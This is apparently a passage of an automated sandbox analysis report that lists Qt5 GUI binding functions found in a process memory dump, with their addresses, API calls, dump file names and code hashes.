                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?supportedDropActions@QStandardItemModel@@UEBA?AV?$QFlags@W4DropAction@Qt@@@@XZ.QT5GUI ref: 00007FF89D94DFAD
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Drop$?supportedAction@Actions@Flags@ItemModel@@Qt@@@@Standard
                                                                                                                                                                                                                                          • String ID: QStandardItemModel$supportedDropActions$supportedDropActions(self) -> Qt.DropActions
                                                                                                                                                                                                                                          • API String ID: 3056417493-3909675295
                                                                                                                                                                                                                                          • Opcode ID: 00897672ea61c64aa3b8010748fc64b2dfa37b0e8d84fb3642155b0ffb5e8df6
                                                                                                                                                                                                                                          • Instruction ID: a1769b7028a403f7c5125ab4a3dbd6a412a5d5a5d65f5f4667d1492bb51eb2a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00897672ea61c64aa3b8010748fc64b2dfa37b0e8d84fb3642155b0ffb5e8df6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5214C37618A4685EB608F15E4542A963A0FF84FD0F444032EA8E47765FF3CF454C704
                                                                                                                                                                                                                                          Function 00007FF89D973E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FromLongLong_Unsigned
                                                                                                                                                                                                                                          • String ID: QRgba64$toArgb32$toArgb32(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3417993445-1311793961
                                                                                                                                                                                                                                          • Opcode ID: 20737046f268b2d1439ce2a7b26e32925274722b1f57032fed5370e11678979c
                                                                                                                                                                                                                                          • Instruction ID: dd0dcbd2b6ea1fd61acbb64001bc1707ff83620847c7c79355e09f7202a76bb2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20737046f268b2d1439ce2a7b26e32925274722b1f57032fed5370e11678979c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16217577B14B8A82EF208B95D8467B923A4FB54FD0F914432DA8E07765DE7CE245C344
                                                                                                                                                                                                                                          Function 00007FF89D993EA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLongPalette@@V0@@
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 2256276294-2407233842
                                                                                                                                                                                                                                          • Opcode ID: 91527a5669e0e785ec8e892bf14fdca3b2671f552bc7a3f8aa753c9c092ce01b
                                                                                                                                                                                                                                          • Instruction ID: e680c6316a99d67a85ec1a20c52944f791bba5fcce3a24d1d8827132ad4aca57
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91527a5669e0e785ec8e892bf14fdca3b2671f552bc7a3f8aa753c9c092ce01b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E221DC37A09B4282EA608F55F45516AB3B0FB88FD4F444532EE8E03B68EF7DE5558704
                                                                                                                                                                                                                                          Function 00007FF89D9BBAA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromItem@@LongStandardV0@@
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 709210250-2407233842
                                                                                                                                                                                                                                          • Opcode ID: c3cf89d32234f65ad9cb8b1ac91d7a74de0947322eaa4eac3e4b6056b424d204
                                                                                                                                                                                                                                          • Instruction ID: 2a622f7886f76ab5d934d2a129db111da75fe60ba3d78c2b123598c284667d36
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3cf89d32234f65ad9cb8b1ac91d7a74de0947322eaa4eac3e4b6056b424d204
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36210E37A09B52C1EA608F55F44516AB3A4FB94FD8F444432EE8E03B68EF3CE5558704
                                                                                                                                                                                                                                          Function 00007FF89D9B3DE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLength@@LongTextV0@@
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 810943551-2407233842
                                                                                                                                                                                                                                          • Opcode ID: 4dbd24ba209c308fef6e0480f9edff2d3a8ef717e8d27e532fa6dcf453951cc1
                                                                                                                                                                                                                                          • Instruction ID: 2d2058dfe42ab8b6418195d4670b9b239ad93460e1030ac4ae3f3631e4148b7c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dbd24ba209c308fef6e0480f9edff2d3a8ef717e8d27e532fa6dcf453951cc1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47210E37A09B4292EB609B56F448169A3A4FB84FD4F444532EEDE03B68EF3CE155C704
                                                                                                                                                                                                                                          Function 00007FF89D95A080 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLongTransform@@V0@@
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 2878255223-2407233842
                                                                                                                                                                                                                                          • Opcode ID: 755035988fd54153b3eaa76621a35a8def6c76b6d861519c82964da188a25547
                                                                                                                                                                                                                                          • Instruction ID: 875509b95ad1b6e21176e2ffa658103c63a91b2fa9b868aaad44bf3a202b7006
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 755035988fd54153b3eaa76621a35a8def6c76b6d861519c82964da188a25547
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF21EB37A09B4281EA608F55F444269A7A4FB84FD4F444532EECE13B68EF3CE5558708
                                                                                                                                                                                                                                          Function 00007FF89D96A000 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_Cursor@@FromLongTextV0@@
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 4057910976-2407233842
                                                                                                                                                                                                                                          • Opcode ID: 830e89769418c5288e5463c1d1b809e18fc441aa69d7688d2c26d999c9b12e46
                                                                                                                                                                                                                                          • Instruction ID: dc2b59c87c1c973b9f5e71a9fe43bbb71336147c98a3b4f91b79399d5d0f1709
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 830e89769418c5288e5463c1d1b809e18fc441aa69d7688d2c26d999c9b12e46
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B421FC37A09B82C1EA608F15F444269B3A4FB85FD4F444132EE9E13B68EF3DE5558708
                                                                                                                                                                                                                                          Function 00007FF89D9B5D60 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?transform@QPainter@@QEBAAEBVQTransform@@XZ.QT5GUI ref: 00007FF89D9B5DBD
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
